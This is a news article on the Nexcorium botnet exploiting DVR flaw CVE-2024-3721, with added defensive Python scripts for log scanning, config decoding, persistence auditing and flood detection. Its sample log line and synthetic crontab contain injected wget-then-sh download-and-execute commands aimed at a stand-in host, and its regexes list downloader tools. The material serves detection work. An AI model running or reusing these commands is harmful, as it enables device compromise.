
Attackers Exploit DVR Command Injection Vulnerability to Deploy Botnet


A recently uncovered malware campaign has drawn considerable attention for its exploitation of a serious command injection vulnerability plaguing digital video recorder (DVR) devices. FortiGuard Labs, renowned for its cybersecurity expertise, has conducted a detailed analysis of this threat, revealing the intricacies of the operation and its implications for cybersecurity.

The focus of the campaign is on a specific vulnerability designated as CVE-2024-3721, particularly affecting TBK DVR systems. This vulnerability enables malicious actors to gain unauthorized access to these devices, allowing them to install a multifaceted Mirai variant malware, referred to as Nexcorium. The research highlights how this malware draws on the architecture of the original Mirai botnet but enhances its capabilities for a broader and more damaging range of attacks.

Research from Fortinet indicates that the initial phase of the attack involves sending carefully crafted requests designed to manipulate vulnerable parameters within the DVR software. These requests trigger the execution of a downloader script, which then fetches malicious binaries tailored to various Linux environments—specifically targeting systems based on ARM, MIPS, and x86-64 architectures. Once these binaries are downloaded, they execute with elevated permissions, further tightening the attackers’ grip on the compromised devices.

Intriguingly, the attack traffic revealed a custom HTTP header that referenced a group known as “Nexus Team.” This detail has led security analysts to speculate that this may be an indication of a previously unidentified threat actor orchestrating the campaign. Following execution, the malware boldly announces its control over the compromised device, marking the success of the infection process.
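As an added illustration (not part of the original report or of Fortinet's analysis), the following Python script shows how a defender could sweep a DVR's web-server access log for the two indicators described above: URL-encoded shell syntax smuggled into request parameters, and a custom request header referencing "Nexus Team". The log lines are constructed for the example; the CGI path, parameter names and downloader address are hypothetical placeholders and are not the real CVE-2024-3721 request.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log sample in a combined-log-style format with one extra
# quoted field carrying a custom request header. The CGI path, parameter names
# and downloader host are hypothetical placeholders, not the real CVE-2024-3721
# request; the second line is the kind of entry the campaign description implies.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /cgi-bin/example.cgi?opt=status HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"
203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "GET /cgi-bin/example.cgi?opt=status&cmd=%3Bwget%20http%3A%2F%2F198.51.100.9%2Fdl.sh%20-O%20%2Ftmp%2Fdl.sh%3Bsh%20%2Ftmp%2Fdl.sh HTTP/1.1" 200 128 "-" "-" "Nexus Team"
10.0.0.8 - - [01/Jan/2025:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<xhdr>[^"]*)"$'
)

# Shell command separators and substitution syntax that have no business in a DVR parameter.
SHELL_META = re.compile(r"(;|\|\||\||&&|`|\$\(|\n)")
# Tooling typically seen in IoT downloader one-liners.
DOWNLOAD_TOOLS = re.compile(r"(wget|curl|tftp|ftpget|busybox|chmod|/bin/sh|/tmp/)", re.I)
# The custom-header marker reported for this campaign.
ACTOR_MARKER = re.compile(r"nexus\s*team", re.I)


def decoded_params(target: str) -> list[tuple[str, str]]:
    """URL-decode the query string so encoded metacharacters (%3B etc.) become visible."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def classify(params, extra_header: str) -> list[str]:
    """Return human-readable reasons why a request looks like an injection attempt."""
    reasons = []
    for name, value in params:
        if SHELL_META.search(value):
            reasons.append(f"shell metacharacter in parameter {name!r}")
        if DOWNLOAD_TOOLS.search(value):
            reasons.append(f"download/exec tooling in parameter {name!r}")
    if ACTOR_MARKER.search(extra_header):
        reasons.append("custom header references 'Nexus Team'")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Parse each line, decode its query string and collect the suspicious ones."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(decoded_params(m["target"]), m["xhdr"])
        if reasons:
            findings.append({"ip": m["ip"], "target": m["target"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["target"][:60])
        for reason in hit["reasons"]:
            print("   -", reason)
```

The decode step matters: the injected separators arrive percent-encoded, so a pattern match on the raw request line would miss them. Run against a real log, the header field must be taken from wherever the web server was configured to record it, since default log formats do not include custom headers.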

Trey Ford, chief strategy and trust officer at Bugcrowd, emphasized the shortcomings of automated scanning in closing security gaps. He posited, “The Nexcorium campaign exemplifies why automated scanning alone cannot tackle exposure vulnerabilities. While machine-speed analysis can identify existing vulnerabilities, only human researchers can deeply understand how adversaries might chain those vulnerabilities to weaponize them, sustaining access over time.”

### Multi-Stage Infection and Persistence Techniques

Once deployed, Nexcorium initializes a configuration set that is obfuscated with XOR encoding. This configuration encompasses vital elements such as command-and-control (C2) server details, specific attack instructions, and a list of built-in credentials used for conducting brute-force attacks on other devices.
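To make the XOR-encoded configuration concrete, here is an added Python example (not code from the report or from the malware itself) that builds a Mirai-style length-prefixed string table with a repeating 4-byte XOR key, decodes it, and shows the known-plaintext trick analysts use to recover such a key from a sample. The key, table layout and entry values are constructed placeholders.

```python
import struct

# Hypothetical 4-byte key and table contents, constructed for this example.
KEY = bytes.fromhex("deadbeef")
SAMPLE_CONFIG = [
    "c2.example.invalid:23",        # C2 endpoint (placeholder)
    "admin:PLACEHOLDER-PASSWORD",   # brute-force credential pair (placeholder)
    "/proc/self/exe",               # path strings are commonly kept in the same table
]


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_table(entries: list[str], key: bytes) -> bytes:
    """Serialise entries as <big-endian u16 length><xor-encoded bytes>..."""
    blob = bytearray()
    for entry in entries:
        enc = xor_bytes(entry.encode(), key)
        blob += struct.pack(">H", len(enc)) + enc
    return bytes(blob)


def decode_table(blob: bytes, key: bytes) -> list[str]:
    """Walk the length-prefixed blob and decode every entry with the key."""
    entries, off = [], 0
    while off < len(blob):
        (n,) = struct.unpack_from(">H", blob, off)
        off += 2
        entries.append(xor_bytes(blob[off:off + n], key).decode())
        off += n
    return entries


def recover_key(blob: bytes, known_plaintext: str, key_len: int) -> bytes:
    """Known-plaintext key recovery: if the first entry's cleartext is guessed
    (a C2 hostname seen in traffic, a fixed path like /proc/), XORing it with the
    stored ciphertext yields the key for any repeating key of that length."""
    (n,) = struct.unpack_from(">H", blob, 0)
    ciphertext = blob[2:2 + n]
    if min(n, len(known_plaintext)) < key_len:
        raise ValueError("known plaintext must be at least one key length long")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_plaintext.encode()[:key_len]))


if __name__ == "__main__":
    blob = encode_table(SAMPLE_CONFIG, KEY)
    print("encoded blob:", blob.hex())
    print("recovered key:", recover_key(blob, SAMPLE_CONFIG[0], len(KEY)).hex())
    for entry in decode_table(blob, KEY):
        print("  ", entry)
```

The point of the encoding is only to keep strings out of a plain `strings` pass; because XOR with a short repeating key is trivially reversible, a single correctly guessed entry is enough to expose the entire table, which is why configuration extraction of Mirai variants is routine once a sample is in hand.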

The operational framework of Nexcorium closely mirrors that of traditional Mirai architecture, featuring modules strategically designated for scanning, maintaining persistence, and executing attacks. One of its notable components is a scanner designed to proliferate across networks by exploiting known vulnerabilities and default credentials over Telnet connections. Included within its library of exploits is CVE-2017-17215, a known vulnerability in Huawei routers, thereby extending its scope beyond DVR devices to a wider array of susceptible targets.

In practical terms, Nexcorium employs a hybrid approach to infection scaling. It exploits CVE-2024-3721 for its initial breach, utilizes default credentials for lateral movement, and targets various CPU architectures while also leveraging legacy exploits. This multifaceted approach allows the malware to infiltrate a wide array of vulnerable devices, increasing its operational reach dramatically.

Maintaining persistence presents another key challenge, which Nexcorium addresses through multiple methods. The malware modifies system initialization files, constructs startup scripts, and registers as a system service to guarantee its activation even after a device is rebooted. Furthermore, it leverages cron jobs to schedule recurring tasks, ensuring long-term access and maintaining control over the infected systems.
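The persistence locations listed above are exactly the places an incident responder should check on a suspect device. As an added example (not from the report or any vendor tool), the Python script below audits an extracted or mounted root filesystem for init files, service definitions and cron entries that execute from world-writable directories or invoke download tooling. It builds a small constructed filesystem in a temporary directory so it can be run as-is; the file contents and the downloader address in them are synthetic.

```python
import re
import tempfile
from pathlib import Path

# Locations on embedded Linux where boot-time or scheduled execution is configured.
PERSISTENCE_PATHS = [
    "etc/rc.local", "etc/inittab", "etc/init.d", "etc/crontab",
    "etc/cron.d", "var/spool/cron/crontabs", "etc/systemd/system",
]

# Execution from writable scratch directories, or downloaders/decoders in a startup
# line, is a strong indicator on a device whose legitimate boot scripts are static.
SUSPECT = re.compile(
    r"(/tmp/|/dev/shm/|/var/tmp/|\bwget\b|\bcurl\b|\btftp\b|base64\s+-d|chmod\s+\+?x)", re.I
)


def audit_file(path: Path) -> list[dict]:
    """Return every non-comment line in the file that matches SUSPECT."""
    findings = []
    try:
        lines = path.read_text(errors="replace").splitlines()
    except OSError:
        return findings
    for no, line in enumerate(lines, 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = SUSPECT.search(stripped)
        if m:
            findings.append({"file": str(path), "line": no, "match": m.group(0), "text": stripped})
    return findings


def audit_root(root: Path) -> list[dict]:
    """Walk the persistence locations under a mounted/extracted root filesystem."""
    findings = []
    for rel in PERSISTENCE_PATHS:
        p = root / rel
        if p.is_dir():
            for f in sorted(p.rglob("*")):
                if f.is_file():
                    findings += audit_file(f)
        elif p.is_file():
            findings += audit_file(p)
    return findings


def build_sample_root() -> Path:
    """Constructed filesystem snapshot: one benign init script, one modified
    rc.local and one injected root crontab. 198.51.100.9 is a test-net address."""
    root = Path(tempfile.mkdtemp(prefix="dvr-audit-"))
    files = {
        "etc/rc.local": "#!/bin/sh\n/usr/sbin/dvrd &\n/tmp/.x/sysd &\nexit 0\n",
        "etc/init.d/S50network": "#!/bin/sh\nifup -a\n",
        "var/spool/cron/crontabs/root":
            "*/5 * * * * wget -q http://198.51.100.9/dl.sh -O /tmp/dl.sh; sh /tmp/dl.sh\n",
    }
    for rel, content in files.items():
        f = root / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_text(content)
    return root


if __name__ == "__main__":
    for finding in audit_root(build_sample_root()):
        print(f"{finding['file']}:{finding['line']}: [{finding['match']}] {finding['text']}")
```

On a real device the audit is best run against an offline copy of the filesystem, since a running implant can hide or restore its own entries; comparing the results against a known-good firmware image of the same model turns the heuristic into a diff of what should not be there.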

### DDoS Capabilities and Operational Impact

After solidifying its foothold, Nexcorium establishes a connection to a remote command server for operational instructions. This remote link allows the malware to facilitate a variety of distributed denial-of-service (DDoS) techniques, including UDP floods, TCP SYN floods, and sophisticated application-layer attacks like SMTP flooding. Each attack command is dynamically delivered from the C2 server, which orchestrates coordinated operational campaigns across all infected devices.
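From the receiving end, the volumetric techniques named above leave recognisable traces: a SYN flood shows up as a burst of SYN-only segments from many sources with almost no completed handshakes, and a UDP flood as a raw packet rate far above baseline. The following added Python example (not part of the original report) scores per-destination, per-second buckets of constructed packet summaries against those two indicators; the thresholds, addresses and traffic shapes are synthetic and would need tuning to a real network's baseline.

```python
from collections import defaultdict


def build_sample_packets() -> list[tuple[float, str, str, str, str]]:
    """Constructed packet summaries: (time_s, src, dst, proto, tcp_flags).
    Addresses are documentation/test ranges; the traffic shapes are synthetic."""
    pkts = []
    # SYN flood: 150 SYN-only segments from many distinct sources within one second.
    for i in range(150):
        pkts.append((i / 150, f"203.0.113.{i % 254 + 1}", "10.0.0.20", "tcp", "S"))
    # Ordinary client traffic: each SYN is followed by ACK-bearing segments.
    for i in range(5):
        pkts += [
            (0.1 * i, "10.0.0.5", "10.0.0.21", "tcp", "S"),
            (0.1 * i + 0.01, "10.0.0.5", "10.0.0.21", "tcp", "A"),
            (0.1 * i + 0.02, "10.0.0.5", "10.0.0.21", "tcp", "PA"),
        ]
    # UDP flood: 300 datagrams to one host within one second.
    for i in range(300):
        pkts.append((i / 300, f"198.51.100.{i % 50 + 1}", "10.0.0.22", "udp", ""))
    return pkts


def detect_floods(packets, window_s=1.0, syn_pps=100, syn_ratio=0.9, udp_pps=200) -> list[dict]:
    """Bucket packets by (destination, time window) and flag SYN-only bursts and
    UDP rates above the configured thresholds."""
    buckets = defaultdict(lambda: {"syn": 0, "ack": 0, "udp": 0, "srcs": set()})
    for ts, src, dst, proto, flags in packets:
        b = buckets[(dst, int(ts // window_s))]
        b["srcs"].add(src)
        if proto == "udp":
            b["udp"] += 1
        elif proto == "tcp":
            if "S" in flags and "A" not in flags:
                b["syn"] += 1       # half-open attempt
            elif "A" in flags:
                b["ack"] += 1       # evidence of a progressing connection
    alerts = []
    for (dst, win), b in sorted(buckets.items()):
        tcp_total = b["syn"] + b["ack"]
        # Short-circuit keeps the ratio from dividing by zero on UDP-only buckets.
        if b["syn"] >= syn_pps and b["syn"] / tcp_total >= syn_ratio:
            alerts.append({"type": "syn_flood", "dst": dst, "window": win,
                           "pps": b["syn"], "sources": len(b["srcs"])})
        if b["udp"] >= udp_pps:
            alerts.append({"type": "udp_flood", "dst": dst, "window": win,
                           "pps": b["udp"], "sources": len(b["srcs"])})
    return alerts


if __name__ == "__main__":
    for alert in detect_floods(build_sample_packets()):
        print(alert)
```

The source count in each alert is the useful triage field: a SYN burst from one or two addresses is usually a misbehaving client, whereas the same volume spread across hundreds of addresses is what a botnet of compromised DVRs and routers produces.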

John Gallagher, vice president of Viakoo Labs, highlighted the pervasive risk enterprises face from IoT devices compromised by Mirai and its variants, particularly through DDoS attacks. He underlined that without proactive measures from organizations to improve cyber hygiene within their IoT infrastructures, such attacks will likely proliferate due to the inherent ease of infection and the malware’s ability to move laterally within networks.

For security teams, Gallagher advised a focus on establishing foundational controls within IoT environments. He noted that traditional agent-based security solutions often fall short for these devices, as they typically do not permit agents to be installed. Instead, he suggested adopting agentless discovery and remediation techniques, emphasizing the importance of automated processes for password and certificate management as well as consistent firmware updates. Such practices are crucial in bolstering defenses against pervasive threats like Nexcorium.

In conclusion, the Nexcorium campaign serves as a stark reminder of the ever-evolving landscape of cyber threats and the necessity for robust security measures across all connected devices. The collaborative efforts from cybersecurity experts will be vital in addressing these vulnerabilities and safeguarding the integrity of IoT ecosystems.
